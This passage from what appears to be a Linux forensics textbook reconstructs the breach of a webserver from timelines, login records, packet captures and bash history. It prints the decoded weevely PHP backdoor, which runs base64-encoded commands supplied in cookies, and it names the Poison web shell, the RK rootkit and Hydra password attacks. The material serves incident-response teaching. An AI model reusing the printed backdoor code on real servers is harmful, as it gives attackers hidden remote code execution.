LEVERAGING MYSQL

The picture of what happened to the PAS webserver is starting to become pretty clear. Because it literally only takes a couple of minutes, the metadata is imported into MySQL using the techniques discussed in Chapter 6. Once everything is loaded in the database, a timeline from May 3 onward is easily created. The timeline shows intense webserver

activity at approximately 22:50 on the 3rd of May. Further analysis reveals changes in the /usr/local/mysql/.weevely directory at 23:53 and the creation of a new file, /var/www/html/index3.php. A portion of the timeline is shown in Figure 9.21.

FIGURE 9.21

Portion of the PAS subject system timeline. The highlighted portion shows new files associated with backdoors.

The index3.php file is shown in Figure 9.22. This is some obfuscated code created by the weevely backdoor. This code both inserts extra characters and uses base64 encoding to hide what it does. $kh becomes “str_replace”, $hbh equals “base64_decode”, and $km is set to “create_function”. This makes the last line $go = create_function(‘’, base64_decode(str_replace(“q”, “”, $iy.$gn.$mom.$scv))); $go();. Parsing all of this through an online base64 decoder produces the following:

$c=’count’;$a=$_COOKIE;if(reset($a)==’ha’ && $c($a)>3){ini_set(‘error_log’, ‘/dev/null’);$k=’cked’;echo

‘<’.$k.’>’;eval(base64_decode(preg_replace(array(‘/\w=\s/’,’/\s/’), array(‘’,’+’), join(array_slice($a,$c($a)-3)))));echo ‘</’.$k.’>’;}

FIGURE 9.22

Obfuscated PHP code from the weevely PHP SSH backdoor.

If you look closely enough, you will see the weevely password “hacked” is embedded in this code, which is also obfuscated.

Further analysis of the time reveals that Hydra was run a few times on the 4th of May. Some of the packet captures created by the webmaster, after a problem was suspected, were also analyzed. There seems to have been a test of the dropbear backdoor on port 44965 in this capture, but most traffic seems to be coming directly on port 22. Some of this traffic is shown in Figure 9.23.

FIGURE 9.23

Some of the traffic captured from the PAS subject system. The bottom four packets appear to be a test of the dropbear backdoor. The remaining packets in this capture are on the normal SSH port 22.

Partial results from running the query select * from logins order by start; are shown in Figure 9.24. The highlighted entries are around the time of the breach. A complete analysis of this information reveals that only John and Michael have been logging on to the system. This indicates that either John’s password has been compromised or that the attacker is not logging in directly. The other evidence gathered so far points to the latter.

FIGURE 9.24

Login information from the PAS subject system.

Running this query of failed logins select * from login_fails order by start; paints a different picture. There is a long string of failed login attempts for John up until 23:07:54 on the 3rd of May. When combined with a successful remote login by John at 23:10:11 that day, it would appear that John’s account has been compromised. The failed logins are shown in Figure 9.25. At this stage it would appear that the initial compromise was the result of a webserver vulnerability. Once the attacker had his or her foot in the door, additional attacks were performed resulting in at least one compromised password.

FIGURE 9.25

Failed login attempts. The failed attempts happen repeatedly until 23:07:54. Consultation with the information from Figure 9.24 indicates that the password was compromised.

While the bash history from .bash_history files doesn’t have timestamps, like the history from Volatility, it can still provide useful information. As shown in Figure 9.26, John’s account was used to download and install two additional rootkits, that we have not yet discovered. The first one is a web shell called Poison, that was installed on the webserver as index2.php. The second one is called RK.

FIGURE 9.26

Evidence of the installation of two additional rootkits.

A listing of PHP files in the document root and the start of the index2.php file are shown in Figure 9.27. The index2.php claims to be the Poison Shell 1.0 by Doddy Hackman. Notice that the timestamp on index2.php is from 2013, unlike some of the other pieces of malware discovered so far that didn’t alter the timestamps.

FIGURE 9.27

Evidence that the Poison Shell 1.0 has been installed on the subject system.

We see a hidden directory called “.rk” that is used to store the RK rootkit. Because we have the subject’s filesystem mounted, we can use the command find -type d -name ’.*’ to locate all hidden directories. The results of running this command against the PAS subject system are shown in Figure 9.28. Note that the “.rk” directory is not listed. This directory must have been deleted later. Furthermore, no new suspicious directories are found.

FIGURE 9.28

Hidden directories on the PAS subject system.

results matching ""

    No results matching ""